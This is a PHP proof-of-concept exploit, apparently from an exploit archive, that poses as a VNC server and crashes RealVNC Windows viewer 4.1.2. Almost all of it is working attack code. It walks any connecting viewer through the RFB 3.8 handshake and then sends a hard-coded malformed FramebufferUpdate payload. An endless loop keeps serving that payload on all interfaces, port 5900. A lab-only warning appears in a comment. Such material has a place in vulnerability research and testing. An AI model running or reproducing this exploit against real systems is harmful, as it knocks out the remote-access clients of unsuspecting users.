# Title : RealVNC Windows Client 4.1.2 Remote DOS Crash PoC
# Published : 2008-08-01
# Author : beford
#!/usr/bin/php
<?php
# RealVNC Windows Client DoS -- a malicious VNC (RFB 3.8) server that crashes a connecting vncviewer.exe
# Crash signature of the affected build (application / faulting module / module offset):
# AppName: vncviewer.exe
# AppVer: 4.1.2.0
# ModName: vncviewer.exe
# ModVer: 4.1.2.0
# Offset: 000229e0
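/**
 * Block until a chunk read from $sock starts with one of $prefixes, or the
 * peer goes away.
 *
 * The original PoC spun on socket_read() until the first byte matched and
 * kept writing even after the client had disconnected; this keeps the
 * "wait for the expected reply" behaviour but stops on EOF / read error.
 *
 * @param resource $sock     connected client socket
 * @param string[] $prefixes accepted leading bytes, e.g. array("\x01")
 * @return bool true once a matching chunk arrived, false on EOF or read error
 */
function vncear_wait_for($sock, array $prefixes) {
    while (($chunk = socket_read($sock, 1024)) !== false && $chunk !== '') {
        foreach ($prefixes as $want) {
            // strncmp is binary-safe, so a "\x00" prefix works.
            if (strncmp($chunk, $want, strlen($want)) === 0) {
                return true;
            }
        }
    }
    return false;
}

/**
 * ServerInit message (RFC 6143 section 7.3.2) the fake server advertises:
 * 1024x768 framebuffer, 32 bpp / depth 24, little-endian, true-colour,
 * 8 bits per channel at shifts 16/8/0, desktop name "ANYULINA".
 *
 * @return string raw message bytes (32 bytes)
 */
function vncear_server_init() {
    return "\x04\x00"                         // framebuffer-width  = 1024 (U16, big-endian)
         . "\x03\x00"                         // framebuffer-height = 768
         /* PIXEL_FORMAT */
         . "\x20"                             // bits-per-pixel = 32
         . "\x18"                             // depth = 24
         . "\x00"                             // big-endian-flag = 0
         . "\x01"                             // true-colour-flag = 1
         . "\x00\xFF"                         // red-max   = 255
         . "\x00\xFF"                         // green-max = 255
         . "\x00\xFF"                         // blue-max  = 255
         . "\x10"                             // red-shift   = 16
         . "\x08"                             // green-shift = 8
         . "\x00"                             // blue-shift  = 0
         . "\x00\x00\x00"                     // padding
         /* end PIXEL_FORMAT */
         . "\x00\x00\x00\x08"                 // name-length = 8
         . "\x41\x4E\x59\x55\x4C\x49\x4E\x41"; // name-string = "ANYULINA"
}

/**
 * The FramebufferUpdate (server message type 0) that crashes the viewer.
 *
 * Header: message-type 0, one byte of padding, number-of-rectangles = 3.
 * The first rectangle header is x=5, y=0xFFFF, width=17, height=20 with
 * encoding-type 0xFFFFFF11 (-239, the Cursor pseudo-encoding in RFC 6143
 * section 7.8.1).
 *
 * NOTE(review): at the 32 bpp advertised in vncear_server_init() (the script
 * never reads a SetPixelFormat from the client) a 17x20 cursor would need
 * 1360 bytes of pixel data plus a 60-byte bitmask, and two more rectangles
 * would have to follow; the bytes below are far shorter, so the viewer
 * presumably faults while parsing this truncated/malformed update. The exact
 * fault path is not established here. The bytes are kept verbatim.
 *
 * @return string raw message bytes
 */
function vncear_payload() {
    return "\x00\x00\x00\x03" // message-type 0 (FramebufferUpdate), padding, number-of-rectangles = 3
         . "\x00\x05\xFF\xFF\x00\x11\x00\x14\xFF\xFF\xFF\x11" // rect 1: x-position, y-position, width, height, encoding-type
         . "\x3F\x3F\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F"
         . "\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F"
         . "\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F"
         . "\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F"
         . "\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F"
         . "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F"
         . "\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x00\x00\x3F"
         . "\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F"
         . "\x00\x00\x00\x3F"
         . "\x00\x3F\x3F\x00\x00\x3F\x3F"
         . "\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x3F\x3F\x3F\x00\x3F"
         . "\x3F\x3F\x3F\x3F\x3F\x3F\x3F"
         . "\x00\x3F\x3F\x00\x3F\x00\x3F\x3F\x00"
         . "\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F"
         . "\x00\x3F\x3F\x00\x3F"
         . "\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00"
         . "\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F"
         . "\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F"
         . "\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00"
         . "\x3F\x3F\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00"
         . "\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F"
         . "\x00\x3F\x3F\x3F\x3F\x3F\x00\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F"
         . "\x00\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F"
         . "\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x06"
         . "\x00\x00\x0F\x00\x00\x0F\x00\x00\x0F\x00\x00"
         . "\x0F\x00\x00\x0F\xC0\x00\x0F\xF8\x00\x0F\xFC\x00\x6F\xFF\x00\xFF"
         . "\xFF\x80\xFF\xFF\x80\x7F\xFF\x80\x3F\xFF\x80\x3F\xFF\x80\x3F\xFF"
         . "\x80\x1F\xFF\x80\x0F\xFF\x00\x0F\xFF\x00\x07\xFE\x00\x03\xFE\x00"
         . "\x00\x00\x00\x00\x04\x00\x03\x00\x00\x00\x00\x10\x00\x00\x94\xFA";
}

/**
 * Drive one connected viewer through the RFB 3.8 handshake and send it the
 * crash payload, then drain the socket until the viewer drops the connection.
 *
 * @param resource $client accepted client socket
 * @return bool false if the client disconnected (or a write failed) before
 *              the payload went out, true once the payload was sent and the
 *              connection was drained
 */
function vncear_serve($client) {
    // ProtocolVersion: announce 3.8; the client replies with its own "RFB xxx.yyy\n".
    socket_write($client, "RFB 003.008\n");
    if (!vncear_wait_for($client, array("RFB 00"))) {
        print "[-] client left during version negotiation\n";
        return false;
    }
    print "\tprotocol has been negotiated\n";

    // Security types: one type offered, type 1 = None; client echoes the chosen type.
    socket_write($client, "\x01\x01");
    if (!vncear_wait_for($client, array("\x01"))) {
        print "[-] client left during security negotiation\n";
        return false;
    }
    print "\tsecurity type accepted\n";

    // SecurityResult OK (U32 0); the client answers with ClientInit (shared-flag 0 or 1).
    socket_write($client, "\x00\x00\x00\x00");
    if (!vncear_wait_for($client, array("\x00", "\x01"))) {
        print "[-] client left before ClientInit\n";
        return false;
    }

    if (socket_write($client, vncear_server_init()) === false
        || socket_write($client, vncear_payload()) === false) {
        print "[-] write failed: " . socket_strerror(socket_last_error($client)) . "\n";
        return false;
    }
    print "\tit should be dead already";
    // One dot per read until the viewer closes the connection (i.e. has crashed).
    while (($chunk = socket_read($client, 1024)) !== false && $chunk !== '') {
        print ".";
    }
    return true;
}

/**
 * Pose as a VNC server for one round: listen, accept a single vncviewer.exe,
 * walk it through ProtocolVersion -> SecurityType (None) -> SecurityResult ->
 * ServerInit, then send the malformed FramebufferUpdate that crashes
 * RealVNC Windows client 4.1.2, and close both sockets.
 *
 * WARNING: offensive PoC. With the default bind address it listens on every
 * interface, and ANY VNC client that connects will be served the crash
 * payload. Run it only on an isolated lab host/network against a client you
 * are authorised to test.
 *
 * @param string $bind address to listen on (the original hard-coded 0.0.0.0)
 * @param int    $port TCP port to listen on (the original hard-coded 5900)
 * @return bool true if a client was served the payload; false if accept()
 *              failed or the client disconnected mid-handshake
 * @throws RuntimeException if the listening socket cannot be created, bound
 *                          or put into listening state
 */
function vncear($bind = "0.0.0.0", $port = 5900) {
    $srv = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($srv === false) {
        throw new RuntimeException("socket_create failed: " . socket_strerror(socket_last_error()));
    }
    // SO_REUSEADDR lets the caller's loop rebind right after the previous round closed.
    socket_set_option($srv, SOL_SOCKET, SO_REUSEADDR, 1);
    if (!socket_bind($srv, $bind, $port) || !socket_listen($srv, 5)) {
        $err = socket_strerror(socket_last_error($srv));
        socket_close($srv);
        throw new RuntimeException("cannot listen on $bind:$port: $err");
    }
    print "\n[+] listening on $port ...\n";

    $client = socket_accept($srv);
    if ($client === false) {
        print "[-] accept failed: " . socket_strerror(socket_last_error($srv)) . "\n";
        socket_close($srv);
        return false;
    }
    print "[+] client connected\n";

    $served = vncear_serve($client);
    socket_close($client);
    socket_close($srv);
    return $served;
}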
print "RealVNC Windows Client DoS (http://realvnc.com/)n";
for (;;)
vncear();
?>